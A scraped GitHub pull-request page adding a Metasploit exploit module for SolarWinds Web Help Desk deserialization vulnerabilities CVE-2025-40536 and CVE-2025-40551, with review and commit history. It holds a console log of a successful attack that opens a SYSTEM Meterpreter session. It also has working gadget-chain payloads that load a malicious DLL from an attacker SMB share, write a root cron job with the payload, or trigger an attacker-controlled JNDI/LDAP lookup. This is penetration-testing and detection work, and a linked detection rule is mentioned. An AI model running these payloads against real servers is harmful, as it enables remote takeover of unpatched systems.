Add exploit module for SolarWinds Web Help Desk (CVE-2025-40536 + CVE-2025-40551) by sfewer-r7 · Pull Request #20917 · rapid7/metasploit-framework

sfewer-r7 · 2026-01-30T22:12:44Z

Overview

This is a (draft) pull request to add an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551.

The module is based off the Nuclei template by horizon3.ai, except I have added a custom gadget to achieve RCE on Windows targets.

To-Do

Add a Linux target. Likely needing an alternative gadget. We can leverage the SQLite technique for a dirty file write which will likely let us drop a cron job for RCE.
Documentation

Example

NOTE: If you are using the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your own payloads.

NOTE: You need to run MSF as root so you can bind to a low port (445 for the SMB server). Also, open your firewall for ingress connections.

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show options 

Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   JOHNPWFILE                   no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can al
                                          so be a path.
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
   RHOSTS      192.168.86.146   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8443             yes       The target port (TCP)
   SRVHOST     192.168.86.122   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                          s.
   SRVPORT     445              yes       The local port to listen on.
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Base path
   VHOST                        no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       eth0             yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows (Native code dropper)



View the full module info with the info, or info -d command.

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
[*] 192.168.86.146:8443 - Cannot reliably check exploitability. Step 1 - Connection failed
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
[+] 192.168.86.146:8443 - The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > exploit 
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > [+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
[*] Step 0 - Starting SMB service...
[*] Server is running. Listening on 192.168.86.122:445
[*] Server started.
[*] Malicious SQLite extension UNC: \\192.168.86.122\iBfAAI\OWxxD.dll
[*] Step 1 - Initial session...
[*] Step 2 - Login pref page...
[*] Step 3 - Trigger SAML object...
[*] Step 4 - Create JSON RPC bridge...
[*] Step 5 - Registering the org.sqlite.JDBC driver...
[*] Step 6 - Loading malicious extension over SMB...
[*] Meterpreter session 2 opened (192.168.86.122:4444 -> 192.168.86.146:53030) at 2026-01-30 22:04:02 +0000

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\WebHelpDesk\bin\webapps\helpdesk
meterpreter >

mfreeman451

lgtm

…rocess Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL). This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious SQLite extensions and achieve remote code execution. https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/ rapid7/metasploit-framework#20917

…n can cause a timeout and the service will restart. The MSF session is not affected by this. And the target is re-exploitable after service restarts.

…ts must be POST and not GET, however on newer versiosn 12.8.* they must be GET

* [New] Suspicious SolarWinds Web Help Desk Java Module Load or Child Process Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL). This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious SQLite extensions and achieve remote code execution. https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/ rapid7/metasploit-framework#20917 * Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com> * Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com> * Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com> --------- Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

…7.* on linux and windows. 12.8.* on linux might work but depends on the underlying cron daemon

…ice prematurly.

sfewer-r7 · 2026-02-04T20:54:56Z

Taking this pull request our of draft. We now have a selection of gadgets to target different versions.

Version 12.8.* targets on Windows

We use a custom (novel?) gadget chain to execute arbitrary SQL via a SQLite database connection. The trick is to leverage the com.zaxxer.hikari.HikariDataSource class to execute arbitrary SQL once a successful DB connection has been made. We then force a connection to a SQLite DB to occur via org.sqlite.SQLiteDataSource, and choose an in-memory DB so we know the connection will be successful (and conveniently not touch disk). We also pass the pragma enable_load_extension=true which will allow us to load a native code extension (i.e. a DLL). We supply a UNC path to a remote share for a Metasploit payload. When this chain executes we get RCE. The JDBC driver org.sqlite.JDBC will not be registered in the system, so we begin by simply instantiation this class, as there is a static initializer which will register the driver for us. The whole thing looks like this:

gadgets.push({
  title: 'Registering the org.sqlite.JDBC driver',
  json_data: {
    'javaClass' => 'org.sqlite.JDBC'
  }
})

gadgets.push({
  title: 'Loading malicious extension over SMB',
  json_data: {
    'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
    'driverClassName' => 'org.sqlite.SQLiteDataSource',
    'jdbcUrl' => 'jdbc:sqlite::memory:?enable_load_extension=true',
    'connectionInitSql' => "SELECT load_extension('#{session_ctx[:service].unc}');"
  }
})

Version 12.8.* targets on Linux

For these targets we can use the above SQLite load_extension technique, but Linux wont read from UNC paths. Instead we leverage a dirty-file-write to drop a malicious cron job. The whole thing looks like this:

gadgets.push({
  title: 'Registering the org.sqlite.JDBC driver',
  json_data: {
    'javaClass' => 'org.sqlite.JDBC'
  }
})

gadgets.push({
  title: "Creating file in /etc/cron.d/#{random_name}",
  json_data: {
    'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
    'driverClassName' => 'org.sqlite.SQLiteDataSource',
    'jdbcUrl' => "jdbc:sqlite:/etc/cron.d/#{random_name}",
    'connectionInitSql' => 'CREATE TABLE a (b TEXT UNIQUE);'
  }
})

gadgets.push({
  title: "Dirty file write to /etc/cron.d/#{random_name}",
  json_data: {
    'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
    'driverClassName' => 'org.sqlite.SQLiteDataSource',
    'jdbcUrl' => "jdbc:sqlite:/etc/cron.d/#{random_name}",
    'connectionInitSql' => "INSERT OR IGNORE INTO a (b) VALUES ('\n* * * * * root #{payload.encoded}\n');"
  }
})

This should work, but in my testing the cron daemon on my Ubuntu 22.04 system would not parse the file, failing with errors like cron[427]: Error: bad minute; while reading /etc/cron.d/hax_5 or cron[427]: (*system*haxb) ERROR (Syntax error, this crontab file will be ignored).

I have left this target in the module as some cron daemons might parse the file. The SolarWinds docs recommend Red Hat Linux which I have note tested.

Version 12.7.* targets on Windows or Linux

We use a known technique for these older versions of the product, and leverage ch.qos.logback.core.db.JNDIConnectionSource to load a class over LDAP. Calling setJndiLocation during deserialization forces an javax.naming.InitialContext lookup to be performed on our attacker controlled JNDI location.

gadgets.push({
  title: 'Malicious JNDI lookup via ch.qos.logback.core.db.JNDIConnectionSource',
  json_data: {
    'javaClass' => 'ch.qos.logback.core.db.JNDIConnectionSource', # logback-core.jar
    'jndiLocation' => jndi_string
  }
})

…annot change it. We print a message to inform the user this port is intended to be in use so that the SMB server is not compleatly opaque.

…ARTS due to how the 12.8.* target on Windows works.

* [New] Suspicious SolarWinds Web Help Desk Java Module Load or Child Process Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL). This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious SQLite extensions and achieve remote code execution. https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/ rapid7/metasploit-framework#20917 * Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com> * Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com> * Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com> --------- Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb

dledda-r7 · 2026-02-13T11:54:26Z

Release Notes

This adds an exploit module for SolarWinds Web Help Desk vulnerable to CVE-2025-40536 and CVE-2025-40551. The exploit triggers session opening as NT AUTHORITY\SYSTEM and root.

add in initial web help desk exploit with a windows target

77b6aff

smcintyre-r7 added this to Metasploit Kanban Jan 30, 2026

github-project-automation bot moved this to Todo in Metasploit Kanban Jan 30, 2026

mfreeman451 reviewed Jan 31, 2026

View reviewed changes

Samirbous mentioned this pull request Feb 2, 2026

[New] SolarWinds Web Help Desk Java Module Load or Child Process elastic/detection-rules#5665

Merged

sfewer-r7 added 7 commits February 3, 2026 10:30

fix typos

8fbc577

we no longer need Retry

d782c7b

remove the unused option FILE_CONTENTS

2733269

favor += so rubocop lets us keep the self. which is more explicit IMHO

290fce8

stability is CRASH_SERVICE_RESTARTS as loading a native code extensio…

683c5c0

…n can cause a timeout and the service will restart. The MSF session is not affected by this. And the target is re-exploitable after service restarts.

detect wind/lin/mac platforms

65b0ef2

we can trigger on older versions like 12.7.11.1182 but several reques…

5b2c094

…ts must be POST and not GET, however on newer versiosn 12.8.* they must be GET

sfewer-r7 added 4 commits February 4, 2026 20:14

rework the targets/paylaods. We now support 12.8.* on windows and 12.…

153a65f

…7.* on linux and windows. 12.8.* on linux might work but depends on the underlying cron daemon

Ships as a Java application running in a x64 java.exe process

7d926ef

block untill we get a session, so we dont tear down the SMB/LDAP serv…

c7e18ee

…ice prematurly.

add docs

50f46aa

sfewer-r7 marked this pull request as ready for review February 4, 2026 20:55

typo in docs

40073bc

smcintyre-r7 moved this from Todo to Ready in Metasploit Kanban Feb 5, 2026

sfewer-r7 added 4 commits February 5, 2026 16:28

fix typo in SRVPORT

2a39aa5

this is the prefered way to test for a non routable IP

5338a8e

remove SMB_SRVPORT as an option. It must allways be 445 so the user c…

58dd291

…annot change it. We print a message to inform the user this port is intended to be in use so that the SMB server is not compleatly opaque.

Lower the ranking to GreatRanking and stability is CRASH_SERVICE_REST…

5accca7

…ARTS due to how the 12.8.* target on Windows works.

bwatters-r7 assigned dledda-r7 Feb 9, 2026

dledda-r7 reviewed Feb 10, 2026

View reviewed changes

modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb Show resolved Hide resolved

modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb Show resolved Hide resolved

dledda-r7 approved these changes Feb 13, 2026

View reviewed changes

github-project-automation bot moved this from Ready to In Progress in Metasploit Kanban Feb 13, 2026

dledda-r7 merged commit a4ec3cd into rapid7:master Feb 13, 2026
18 checks passed

github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Feb 13, 2026

cgranleese-r7 added module rn-modules release notes for new or majorly enhanced modules labels Feb 13, 2026

dledda-r7 removed this from Metasploit Kanban Mar 9, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add exploit module for SolarWinds Web Help Desk (CVE-2025-40536 + CVE-2025-40551)#20917

Add exploit module for SolarWinds Web Help Desk (CVE-2025-40536 + CVE-2025-40551)#20917
dledda-r7 merged 17 commits intorapid7:masterfrom
sfewer-r7:solarwinds-webhelpdesk-rce

sfewer-r7 commented Jan 30, 2026 •

edited

Loading

Uh oh!

mfreeman451 left a comment

Uh oh!

sfewer-r7 commented Feb 4, 2026

Uh oh!

Uh oh!

Uh oh!

Uh oh!

dledda-r7 commented Feb 13, 2026 •

edited by cgranleese-r7

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

5 participants

Conversation

sfewer-r7 commented Jan 30, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Overview

To-Do

Example

Uh oh!

mfreeman451 left a comment

Choose a reason for hiding this comment

Uh oh!

sfewer-r7 commented Feb 4, 2026

Version 12.8.* targets on Windows

Version 12.8.* targets on Linux

Version 12.7.* targets on Windows or Linux

Uh oh!

Uh oh!

Uh oh!

Uh oh!

dledda-r7 commented Feb 13, 2026 • edited by cgranleese-r7 Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Release Notes

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

5 participants

sfewer-r7 commented Jan 30, 2026 •

edited

Loading

dledda-r7 commented Feb 13, 2026 •

edited by cgranleese-r7

Loading